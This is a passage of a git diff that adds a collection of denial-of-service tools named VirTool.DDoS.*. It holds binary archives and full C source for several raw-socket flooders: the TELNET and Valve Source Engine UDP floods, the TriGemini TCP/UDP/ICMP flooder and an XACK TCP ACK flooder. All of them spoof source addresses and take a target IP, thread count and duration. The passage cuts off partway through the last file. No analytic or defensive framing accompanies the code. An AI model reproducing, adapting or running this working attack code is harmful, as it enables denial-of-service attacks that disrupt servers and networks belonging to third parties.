+    sleep(atoi(argv[4]));
+  } else {
+    while(1){
+      sleep(1);
+    }
+  }
+  return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.SYN.7z b/libs/VirTool.DDoS.SYN.7z
new file mode 100644
index 00000000..664ce9e9
Binary files /dev/null and b/libs/VirTool.DDoS.SYN.7z differ
diff --git a/libs/VirTool.DDoS.TCP.a b/libs/VirTool.DDoS.TCP.a
new file mode 100644
index 00000000..57ec916c
Binary files /dev/null and b/libs/VirTool.DDoS.TCP.a differ
diff --git a/libs/VirTool.DDoS.TELNET.c b/libs/VirTool.DDoS.TELNET.c
new file mode 100644
index 00000000..607eb44b
--- /dev/null
+++ b/libs/VirTool.DDoS.TELNET.c
@@ -0,0 +1,172 @@
+#include <pthread.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/udp.h>
+ 
+#define MAX_PACKET_SIZE 4096
+#define PHI 0x9e3779b9
+ 
+static unsigned long int Q[4096], c = 362436;
+static unsigned int floodport;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+ 
+void init_rand(unsigned long int x)
+{
+        int i;
+        Q[0] = x;
+        Q[1] = x + PHI;
+        Q[2] = x + PHI + PHI;
+        for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
+}
+unsigned long int rand_cmwc(void)
+{
+        unsigned long long int t, a = 18782LL;
+        static unsigned long int i = 4095;
+        unsigned long int x, r = 0xfffffffe;
+        i = (i + 1) & 4095;
+        t = a * Q[i] + c;
+        c = (t >> 32);
+        x = t + c;
+        if (x < c) {
+                x++;
+                c++;
+        }
+        return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int count)
+{
+        register unsigned long sum = 0;
+        while( count > 1 ) { sum += *buf++; count -= 2; }
+        if(count > 0) { sum += *(unsigned char *)buf; }
+        while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
+        return (unsigned short)(~sum);
+}
+ 
+void setup_ip_header(struct iphdr *iph)
+{
+        iph->ihl = 5;
+        iph->version = 4;
+        iph->tos = 0;
+        iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 33;
+        iph->id = htonl(54321);
+        iph->frag_off = 0;
+        iph->ttl = MAXTTL;
+        iph->protocol = IPPROTO_UDP;
+        iph->check = 0;
+        iph->saddr = inet_addr("192.168.3.100");
+}
+ 
+void setup_udp_header(struct udphdr *udph)
+{
+        udph->source = htons(27015);
+    udph->dest = htons(27015);
+    udph->check = 0;
+        void *data = (void *)udph + sizeof(struct udphdr);
+        memset(data, 0xFF, 4);
+        strcpy(data+4, "\xff\xfb\x25\xff\xfd\x26\xff\xfb\x26\xff\xfd\x03\xff\xfb\x18\xff\xfb\x1f\xff\xfb\x20\xff\xfb\x21\xff\xfb\x22\xff\xfb\x27\xff\xfd\x05");
+    udph->len=htons(sizeof(struct udphdr) + 33);
+}
+ 
+void *flood(void *par1)
+{
+        char *td = (char *)par1;
+        char datagram[MAX_PACKET_SIZE];
+        struct iphdr *iph = (struct iphdr *)datagram;
+        struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
+       
+        struct sockaddr_in sin;
+        sin.sin_family = AF_INET;
+        sin.sin_port = htons(17015);
+        sin.sin_addr.s_addr = inet_addr(td);
+ 
+        int s = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
+        if(s < 0){
+                fprintf(stderr, "Could not open raw socket.\n");
+                exit(-1);
+        }
+        memset(datagram, 0, MAX_PACKET_SIZE);
+        setup_ip_header(iph);
+        setup_udp_header(udph);
+ 
+        iph->daddr = sin.sin_addr.s_addr;
+        iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+ 
+        int tmp = 1;
+        const int *val = &tmp;
+        if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+                fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+                exit(-1);
+        }
+ 
+        init_rand(time(NULL));
+        register unsigned int i;
+        i = 0;
+        while(1){
+                sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+                iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
+                iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+                iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+               
+                pps++;
+                if(i >= limiter)
+                {
+                        i = 0;
+                        usleep(sleeptime);
+                }
+                i++;
+        }
+}
+int main(int argc, char *argv[ ])
+{
+        if(argc < 5){
+                fprintf(stderr, "Invalid parameters!\n");
+                fprintf(stdout, "Telnet Khaos\nUsage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
+                exit(-1);
+        }
+ 
+        fprintf(stdout, "Setting up Sockets...\n");
+ 
+        int num_threads = atoi(argv[2]);
+        int maxpps = atoi(argv[3]);
+        limiter = 0;
+        pps = 0;
+        pthread_t thread[num_threads];
+       
+        int multiplier = 20;
+ 
+        int i;
+        for(i = 0;i<num_threads;i++){
+                pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
+        }
+        fprintf(stdout, "Starting Flood...\n");
+        for(i = 0;i<(atoi(argv[4])*multiplier);i++)
+        {
+                usleep((1000/multiplier)*1000);
+                if((pps*multiplier) > maxpps)
+                {
+                        if(1 > limiter)
+                        {
+                                sleeptime+=100;
+                        } else {
+                                limiter--;
+                        }
+                } else {
+                        limiter++;
+                        if(sleeptime > 25)
+                        {
+                                sleeptime-=25;
+                        } else {
+                                sleeptime = 0;
+                        }
+                }
+                pps = 0;
+        }
+ 
+        return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.TRIGIMINI.c b/libs/VirTool.DDoS.TRIGIMINI.c
new file mode 100644
index 00000000..4bb25d4c
--- /dev/null
+++ b/libs/VirTool.DDoS.TRIGIMINI.c
@@ -0,0 +1,379 @@
+/*
+ * This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <sys/types.h>
+#ifdef F_PASS
+#include <sys/stat.h>
+#endif
+#include <netinet/in_systm.h>                                                  
+#include <sys/socket.h>
+#include <string.h>
+#include <time.h>
+#include <signal.h>
+#ifndef __USE_BSD
+#   define __USE_BSD
+#endif
+#ifndef __FAVOR_BSD
+#   define __FAVOR_BSD
+#endif
+#include <netinet/in.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+#include <netinet/udp.h>
+#include <netinet/ip_icmp.h>
+#include <arpa/inet.h>
+#ifdef LINUX
+#   define FIX(x)  htons(x)
+#else
+#   define FIX(x)  (x)
+#endif
+#define TCP_ACK         1
+#define TCP_FIN         2
+#define TCP_SYN         4
+#define TCP_RST         8
+#define UDP_CFF         16
+#define ICMP_ECHO_G     32
+#define TCP_NOF         64 
+#define TCP_URG         128
+#define TCP_PSH			258
+#define TCP_ECE			512
+#define TCP_CWR			1024
+
+#define TH_NOF         0x0
+        #define TH_ECE  0x40
+        #define TH_CWR  0x80
+#define TCP_ATTACK()    (a_flags & TCP_ACK ||\
+                         a_flags & TCP_FIN ||\
+                         a_flags & TCP_SYN ||\
+                         a_flags & TCP_RST ||\
+                         a_flags & TCP_NOF ||\
+                        a_flags & TCP_PSH ||\
+                        a_flags & TCP_ECE ||\
+                        a_flags & TCP_CWR ||\
+                         a_flags & TCP_URG )
+#define UDP_ATTACK()    (a_flags & UDP_CFF)
+#define ICMP_ATTACK()   (a_flags & ICMP_ECHO_G)
+#define CHOOSE_DST_PORT() dst_sp == 0 ?\
+                          random ()   :\
+                          htons(dst_sp + (random() % (dst_ep -dst_sp +1)));
+#define CHOOSE_SRC_PORT() src_sp == 0 ?\
+                          random ()   :\
+                          htons(src_sp + (random() % (src_ep -src_sp +1)));
+#define SEND_PACKET()   if (sendto(rawsock,\
+                                   &packet,\
+                                   (sizeof packet),\
+                                   0,\
+                                   (struct sockaddr *)&target,\
+                                    sizeof target) < 0) {\
+                                        perror("sendto");\
+                                        exit(-1);\
+                        }
+#define BANNER_CKSUM 54018
+//#define BANNER_CKSUM 723
+u_long lookup(const char *host);
+unsigned short in_cksum(unsigned short *addr, int len);                        
+static void inject_iphdr(struct ip *ip, u_char p, u_char len);
+char *class2ip(const char *class);
+static void send_tcp(u_char th_flags);
+static void send_udp(u_char garbage);
+static void send_icmp(u_char garbage);
+char *get_plain(const char *crypt_file, const char *xor_data_key);
+static void usage(const char *argv0);
+u_long dstaddr;
+u_short dst_sp, dst_ep, src_sp, src_ep;
+char *src_class, *dst_class;
+int a_flags, rawsock;
+struct sockaddr_in target;
+struct pseudo_hdr {         
+    u_long saddr, daddr;    
+    u_char mbz, ptcl;       
+    u_short tcpl;           
+};
+struct cksum {
+    struct pseudo_hdr pseudo;
+    struct tcphdr tcp;
+};
+struct {
+    int gv; 
+    int kv;
+    void (*f)(u_char);
+} a_list[] = {
+    { TCP_ACK, TH_ACK, send_tcp },
+    { TCP_FIN, TH_FIN, send_tcp },
+    { TCP_SYN, TH_SYN, send_tcp },
+    { TCP_RST, TH_RST, send_tcp },
+    { TCP_NOF, TH_NOF, send_tcp },
+    { TCP_URG, TH_URG, send_tcp },
+    { TCP_PSH, TH_PUSH, send_tcp },
+    { TCP_ECE, TH_ECE, send_tcp },
+    { TCP_CWR, TH_CWR, send_tcp },
+    { UDP_CFF, 0, send_udp },
+    { ICMP_ECHO_G, ICMP_ECHO, send_icmp },
+    { 0, 0, (void *)NULL },
+};
+int
+main(int argc, char *argv[])
+{
+    int n, i, on = 1;
+    int b_link;
+#ifdef F_PASS
+    struct stat sb;
+#endif
+    unsigned int until;
+    a_flags = dstaddr = i = 0;
+    dst_sp = dst_ep = src_sp = src_ep = 0;
+    until = b_link = -1;
+    src_class = dst_class = NULL;
+    while ( (n = getopt(argc, argv, "T:UINs:h:d:p:q:l:t:")) != -1) {
+        char *p;
+        switch (n) {
+            case 'T':
+                switch (atoi(optarg)) {
+                    case 0: a_flags |= TCP_ACK; break;
+                    case 1: a_flags |= TCP_FIN; break;
+                    case 2: a_flags |= TCP_RST; break;
+                    case 3: a_flags |= TCP_SYN; break;
+                    case 4: a_flags |= TCP_URG; break;
+                    case 5: a_flags |= TCP_PSH; break;
+                    case 6: a_flags |= TCP_ECE; break;
+                    case 7: a_flags |= TCP_CWR; break;
+                }
+                break;
+            case 'U':
+                a_flags |= UDP_CFF;
+                break;
+            case 'I': 
+                a_flags |= ICMP_ECHO_G;
+                break;
+            case 'N': 
+                a_flags |= TCP_NOF;
+                break;
+            case 's':
+                src_class = optarg;
+                break;
+            case 'h':
+                dstaddr = lookup(optarg);    
+                break;
+            case 'd':
+                dst_class = optarg;
+                i = 1; 
+                break;
+            case 'p':
+                if ( (p = (char *) strchr(optarg, ',')) == NULL)
+                    usage(argv[0]);
+                dst_sp = atoi(optarg); 
+                dst_ep = atoi(p +1);  
+                break;
+            case 'q':
+                if ( (p = (char *) strchr(optarg, ',')) == NULL)
+                    usage(argv[0]);
+                src_sp = atoi(optarg); 
+                src_ep = atoi(p +1); 
+                break;
+            case 'l':
+                b_link = atoi(optarg);
+                if (b_link <= 0 || b_link > 100)
+                    usage(argv[0]);
+                break;
+            case 't':
+                until = time(0) +atoi(optarg);
+                break;
+            default:
+                usage(argv[0]);
+                break;
+        }
+    }
+    if ( (!dstaddr && !i) ||
+         (dstaddr && i) ||
+         (!TCP_ATTACK() && !UDP_ATTACK() && !ICMP_ATTACK()) ||
+         (src_sp != 0 && src_sp > src_ep) ||
+         (dst_sp != 0 && dst_sp > dst_ep))
+            usage(argv[0]);
+    srandom(time(NULL) ^ getpid());
+    if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
+        perror("socket");
+        exit(-1);
+    }
+    if (setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL,
+        (char *)&on, sizeof(on)) < 0) {
+            perror("setsockopt");
+            exit(-1);
+    }
+    target.sin_family           = AF_INET;
+    for (n = 0; ; ) {
+        if (b_link != -1 && random() % 100 +1 > b_link) {
+            if (random() % 200 +1 > 199)
+                usleep(1);
+            continue;
+        }
+        for (i = 0; a_list[i].f != NULL; ++i) {
+            if (a_list[i].gv & a_flags)
+                a_list[i].f(a_list[i].kv);
+        }        
+        if (n++ == 100) {
+            if (until != -1 && time(0) >= until) break;
+            n = 0;
+        }
+    }          
+    exit(0);
+}
+u_long
+lookup(const char *host)
+{
+    struct hostent *hp;
+  
+    if ( (hp = gethostbyname(host)) == NULL) {
+        perror("gethostbyname");
+        exit(-1);
+    }
+    return *(u_long *)hp->h_addr;
+}
+#define RANDOM() (int) random() % 255 +1
+char *
+class2ip(const char *class)
+{
+    static char ip[16];
+    int i, j;
+  
+    for (i = 0, j = 0; class[i] != '{TEXTO}'; ++i)
+        if (class[i] == '.')
+            ++j;
+    switch (j) {
+        case 0:
+            sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM());
+            break;
+        case 1:
+            sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM());
+            break;
+        case 2:
+            sprintf(ip, "%s.%d", class, RANDOM());
+            break;
+        default: strncpy(ip, class, 16);
+                 break;
+    }
+    return ip;
+}
+unsigned short
+in_cksum(unsigned short *addr, int len)
+{
+    int nleft = len;
+    int sum = 0;
+    unsigned short *w = addr;
+    unsigned short answer = 0;
+    while (nleft > 1) {
+        sum += *w++;
+        nleft -= 2;
+    }
+    if (nleft == 1) {
+        *(unsigned char *) (&answer) = *(unsigned char *)w;
+        sum += answer;
+    }
+    sum    = (sum >> 16) + (sum & 0xffff);  
+    sum   += (sum >> 16);                   
+    answer = ~sum;                         
+    return answer;
+}
+static void
+inject_iphdr(struct ip *ip, u_char p, u_char len)
+{
+    ip->ip_hl             = 5;
+    ip->ip_v              = 4;
+    ip->ip_p              = p;
+    ip->ip_tos            = 0x08;
+    ip->ip_id             = random();
+    ip->ip_len            = len;
+    ip->ip_off            = 0;
+    ip->ip_ttl            = 255;
+    ip->ip_dst.s_addr     = dst_class != NULL ?
+                            inet_addr(class2ip(dst_class)) :
+                            dstaddr; 
+    ip->ip_src.s_addr     = src_class != NULL ?
+                            inet_addr(class2ip(src_class)) :
+                            random();
+    target.sin_addr.s_addr = ip->ip_dst.s_addr;
+}    
+static void
+send_tcp(u_char th_flags)
+{
+    struct cksum cksum;
+    struct packet {
+       struct ip ip;
+        struct tcphdr tcp;
+    } packet;
+    memset(&packet, 0, sizeof packet);
+    inject_iphdr(&packet.ip, IPPROTO_TCP, FIX(sizeof packet));
+    packet.ip.ip_sum        = in_cksum((void *)&packet.ip, 20);
+    cksum.pseudo.daddr      = dstaddr;
+    cksum.pseudo.mbz        = 0;
+    cksum.pseudo.ptcl       = IPPROTO_TCP;
+    cksum.pseudo.tcpl       = htons(sizeof(struct tcphdr));
+    cksum.pseudo.saddr      = packet.ip.ip_src.s_addr;
+    packet.tcp.th_win       = random();
+    packet.tcp.th_seq       = random();
+    packet.tcp.th_ack       = random();
+    packet.tcp.th_flags     = th_flags;
+    packet.tcp.th_off       = 5;
+    packet.tcp.th_urp       = 0;
+    packet.tcp.th_sport     = CHOOSE_SRC_PORT();
+    packet.tcp.th_dport     = CHOOSE_DST_PORT();
+    cksum.tcp               = packet.tcp;
+    packet.tcp.th_sum       = in_cksum((void *)&cksum, sizeof(cksum));
+    SEND_PACKET();
+}
+static void
+send_udp(u_char garbage) 
+{                      
+    struct packet {
+        struct ip ip;
+        struct udphdr udp;
+    } packet;
+    memset(&packet, 0, sizeof packet);
+    inject_iphdr(&packet.ip, IPPROTO_UDP, FIX(sizeof packet));
+    packet.ip.ip_sum            = in_cksum((void *)&packet.ip, 20);
+    packet.udp.uh_sport         = CHOOSE_SRC_PORT();
+    packet.udp.uh_dport         = CHOOSE_DST_PORT();
+    packet.udp.uh_ulen          = htons(sizeof packet.udp);
+    packet.udp.uh_sum           = 0; 
+    SEND_PACKET();
+}
+static void
+send_icmp(u_char gargabe) 
+{
+    struct packet {
+        struct ip ip;
+        struct icmp icmp;
+    } packet;
+    memset(&packet, 0, sizeof packet);
+    inject_iphdr(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet));
+    packet.ip.ip_sum            = in_cksum((void *)&packet.ip, 20);
+    packet.icmp.icmp_type       = ICMP_ECHO;
+    packet.icmp.icmp_code       = 0;
+    packet.icmp.icmp_cksum      = htons( ~(ICMP_ECHO << 8));
+    SEND_PACKET();
+} 
+const char *banner = "TriGemini. [TCP/UDP/ICMP Packet flooder]";
+static void
+usage(const char *argv0)
+{
+	printf("%s \n", banner);
+        printf("    -U UDP   attack                         \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
+        printf("    -I ICMP  attack                         \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
+        printf("    -N Bogus attack                         \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
+	printf("    -T TCP   attack                     \e[1;37m[\e[0m0:ACK   1: FIN\e[1;37m]\e[0m\n");
+	printf("                                        \e[1;37m[\e[0m2:RST   3: SYN\e[1;37m]\e[0m\n");		
+	printf("                                        \e[1;37m[\e[0m4:URG   5:PUSH\e[1;37m]\e[0m\n");
+	printf("                                        \e[1;37m[\e[0m6:ECE   7: CWR\e[1;37m]\e[0m\n");	
+        printf("    -h target host/ip                       \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n");
+        printf("    -d destination class                        \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
+        printf("    -s source class/ip                          \e[1;37m(\e[m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
+        printf("    -p destination port range [start,end]       \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
+        printf("    -q source port range      [start,end]       \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
+        printf("    -l pps limiter                            \e[1;37m(\e[0m\e[0;31mno limit\e[0m\e[1;37m)\e[0m\n");
+        printf("    -t timeout                              \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n");
+    printf("\e[1musage\e[0m: %s [-T0 -T1 -T2 -T3 -T4 -T5 -T6 -T7 -U -I] -h -t\n", argv0);
+    exit(-1);
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.TS3.7z b/libs/VirTool.DDoS.TS3.7z
new file mode 100644
index 00000000..5d40d220
Binary files /dev/null and b/libs/VirTool.DDoS.TS3.7z differ
diff --git a/libs/VirTool.DDoS.UDP.7z b/libs/VirTool.DDoS.UDP.7z
new file mode 100644
index 00000000..fcc2613f
Binary files /dev/null and b/libs/VirTool.DDoS.UDP.7z differ
diff --git a/libs/VirTool.DDoS.VSE.c b/libs/VirTool.DDoS.VSE.c
new file mode 100644
index 00000000..514e0275
--- /dev/null
+++ b/libs/VirTool.DDoS.VSE.c
@@ -0,0 +1,176 @@
+/*
+ * Valve Source Engine Layer 7 by LSDEV
+ */
+ 
+#include <pthread.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/udp.h>
+ 
+#define MAX_PACKET_SIZE 4096
+#define PHI 0x9e3779b9
+ 
+static unsigned long int Q[4096], c = 362436;
+static unsigned int floodport;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+ 
+void init_rand(unsigned long int x)
+{
+        int i;
+        Q[0] = x;
+        Q[1] = x + PHI;
+        Q[2] = x + PHI + PHI;
+        for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
+}
+unsigned long int rand_cmwc(void)
+{
+        unsigned long long int t, a = 18782LL;
+        static unsigned long int i = 4095;
+        unsigned long int x, r = 0xfffffffe;
+        i = (i + 1) & 4095;
+        t = a * Q[i] + c;
+        c = (t >> 32);
+        x = t + c;
+        if (x < c) {
+                x++;
+                c++;
+        }
+        return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int count)
+{
+        register unsigned long sum = 0;
+        while( count > 1 ) { sum += *buf++; count -= 2; }
+        if(count > 0) { sum += *(unsigned char *)buf; }
+        while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
+        return (unsigned short)(~sum);
+}
+ 
+void setup_ip_header(struct iphdr *iph)
+{
+        iph->ihl = 5;
+        iph->version = 4;
+        iph->tos = 0;
+        iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 25;
+        iph->id = htonl(54321);
+        iph->frag_off = 0;
+        iph->ttl = MAXTTL;
+        iph->protocol = IPPROTO_UDP;
+        iph->check = 0;
+        iph->saddr = inet_addr("192.168.3.100");
+}
+ 
+void setup_udp_header(struct udphdr *udph)
+{
+        udph->source = htons(27015);
+    udph->dest = htons(27015);
+    udph->check = 0;
+        void *data = (void *)udph + sizeof(struct udphdr);
+        memset(data, 0xFF, 4);
+        strcpy(data+4, "TSource Engine Query");
+    udph->len=htons(sizeof(struct udphdr) + 25);
+}
+ 
+void *flood(void *par1)
+{
+        char *td = (char *)par1;
+        char datagram[MAX_PACKET_SIZE];
+        struct iphdr *iph = (struct iphdr *)datagram;
+        struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
+       
+        struct sockaddr_in sin;
+        sin.sin_family = AF_INET;
+        sin.sin_port = htons(17015);
+        sin.sin_addr.s_addr = inet_addr(td);
+ 
+        int s = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
+        if(s < 0){
+                fprintf(stderr, "Could not open raw socket.\n");
+                exit(-1);
+        }
+        memset(datagram, 0, MAX_PACKET_SIZE);
+        setup_ip_header(iph);
+        setup_udp_header(udph);
+ 
+        iph->daddr = sin.sin_addr.s_addr;
+        iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+ 
+        int tmp = 1;
+        const int *val = &tmp;
+        if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+                fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+                exit(-1);
+        }
+ 
+        init_rand(time(NULL));
+        register unsigned int i;
+        i = 0;
+        while(1){
+                sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+                iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
+                iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+                iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+               
+                pps++;
+                if(i >= limiter)
+                {
+                        i = 0;
+                        usleep(sleeptime);
+                }
+                i++;
+        }
+}
+int main(int argc, char *argv[ ])
+{
+        if(argc < 5){
+                fprintf(stderr, "Invalid parameters!\n");
+                fprintf(stdout, "Valve Source Engine Layer 7 by LSDEV\nUsage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
+                exit(-1);
+        }
+ 
+        fprintf(stdout, "Setting up Sockets...\n");
+ 
+        int num_threads = atoi(argv[2]);
+        int maxpps = atoi(argv[3]);
+        limiter = 0;
+        pps = 0;
+        pthread_t thread[num_threads];
+       
+        int multiplier = 20;
+ 
+        int i;
+        for(i = 0;i<num_threads;i++){
+                pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
+        }
+        fprintf(stdout, "Starting Flood...\n");
+        for(i = 0;i<(atoi(argv[4])*multiplier);i++)
+        {
+                usleep((1000/multiplier)*1000);
+                if((pps*multiplier) > maxpps)
+                {
+                        if(1 > limiter)
+                        {
+                                sleeptime+=100;
+                        } else {
+                                limiter--;
+                        }
+                } else {
+                        limiter++;
+                        if(sleeptime > 25)
+                        {
+                                sleeptime-=25;
+                        } else {
+                                sleeptime = 0;
+                        }
+                }
+                pps = 0;
+        }
+ 
+        return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.WIZARD.a b/libs/VirTool.DDoS.WIZARD.a
new file mode 100644
index 00000000..36838208
Binary files /dev/null and b/libs/VirTool.DDoS.WIZARD.a differ
diff --git a/libs/VirTool.DDoS.XACK.c b/libs/VirTool.DDoS.XACK.c
new file mode 100644
index 00000000..96d5d1ab
--- /dev/null
+++ b/libs/VirTool.DDoS.XACK.c
@@ -0,0 +1,216 @@
+/*
+ * This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
+ */
+#include <unistd.h>
+#include <time.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <netinet/tcp.h>
+#include <netinet/ip.h>
+#include <netinet/in.h>
+#include <netinet/if_ether.h>
+#include <netdb.h>
+#include <net/if.h>
+#include <arpa/inet.h>
+
+#define MAX_PACKET_SIZE 65534
+#define PHI 0x9e3779b9
+
+static unsigned long int Q[4096], c = 362436;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+
+void init_rand(unsigned long int x)
+{
+	int i;
+	Q[0] = x;
+	Q[1] = x + PHI;
+	Q[2] = x + PHI + PHI;
+	for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
+}
+unsigned long int rand_cmwc(void)
+{
+	unsigned long long int t, a = 18782LL;
+	static unsigned long int i = 4095;
+	unsigned long int x, r = 0xfffffffe;
+	i = (i + 1) & 4095;
+	t = a * Q[i] + c;
+	c = (t >> 32);
+	x = t + c;
+	if (x < c) {
+		x++;
+		c++;
+	}
+	return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int count)
+{
+	register unsigned long sum = 0;
+	while( count > 1 ) { sum += *buf++; count -= 2; }
+	if(count > 0) { sum += *(unsigned char *)buf; }
+	while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
+	return (unsigned short)(~sum);
+}
+
+unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
+
+	struct tcp_pseudo
+	{
+		unsigned long src_addr;
+		unsigned long dst_addr;
+		unsigned char zero;
+		unsigned char proto;
+		unsigned short length;
+	} pseudohead;
+	unsigned short total_len = iph->tot_len;
+	pseudohead.src_addr=iph->saddr;
+	pseudohead.dst_addr=iph->daddr;
+	pseudohead.zero=0;
+	pseudohead.proto=IPPROTO_TCP;
+	pseudohead.length=htons(sizeof(struct tcphdr));
+	int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
+	unsigned short *tcp = malloc(totaltcp_len);
+	memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
+	memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
+	unsigned short output = csum(tcp,totaltcp_len);
+	free(tcp);
+	return output;
+}
+
+void setup_ip_header(struct iphdr *iph)
+{
+	iph->ihl = 5;
+	iph->version = 4;
+	iph->tos = 0;
+	iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
+	iph->id = htonl(54321);
+	iph->frag_off = 0;
+	iph->ttl = MAXTTL;
+	iph->protocol = 6;
+	iph->check = 0;
+	iph->saddr = inet_addr("192.168.3.100");
+}
+
+void setup_tcp_header(struct tcphdr *tcph)
+{
+	tcph->source = rand();
+	tcph->seq = rand();
+	tcph->ack_seq = rand();
+	tcph->res2 = 0;
+	tcph->doff = 5;
+	tcph->ack = 1;
+	tcph->window = rand();
+	tcph->check = 0;
+	tcph->urg_ptr = 0;
+}
+
+void *flood(void *par1)
+{
+	char *td = (char *)par1;
+	char datagram[MAX_PACKET_SIZE];
+	struct iphdr *iph = (struct iphdr *)datagram;
+	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
+	
+	struct sockaddr_in sin;
+	sin.sin_family = AF_INET;
+	sin.sin_port = rand();
+	sin.sin_addr.s_addr = inet_addr(td);
+
+	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+	if(s < 0){
+		fprintf(stderr, "Could not open raw socket.\n");
+		exit(-1);
+	}
+	memset(datagram, 0, MAX_PACKET_SIZE);
+	setup_ip_header(iph);
+	setup_tcp_header(tcph);
+
+	tcph->dest = rand();
+
+	iph->daddr = sin.sin_addr.s_addr;
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+
+	int tmp = 1;
+	const int *val = &tmp;
+	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+		fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+		exit(-1);
+	}
+
+	init_rand(time(NULL));
+	register unsigned int i;
+	i = 0;
+	while(1){
+		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+
+		iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
+		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+		iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+		tcph->seq = rand_cmwc() & 0xFFFF;
+		tcph->source = htons(rand_cmwc() & 0xFFFF);
+		tcph->check = 0;
+		tcph->check = tcpcsum(iph, tcph);
+		
+		pps++;
+		if(i >= limiter)
+		{
+			i = 0;
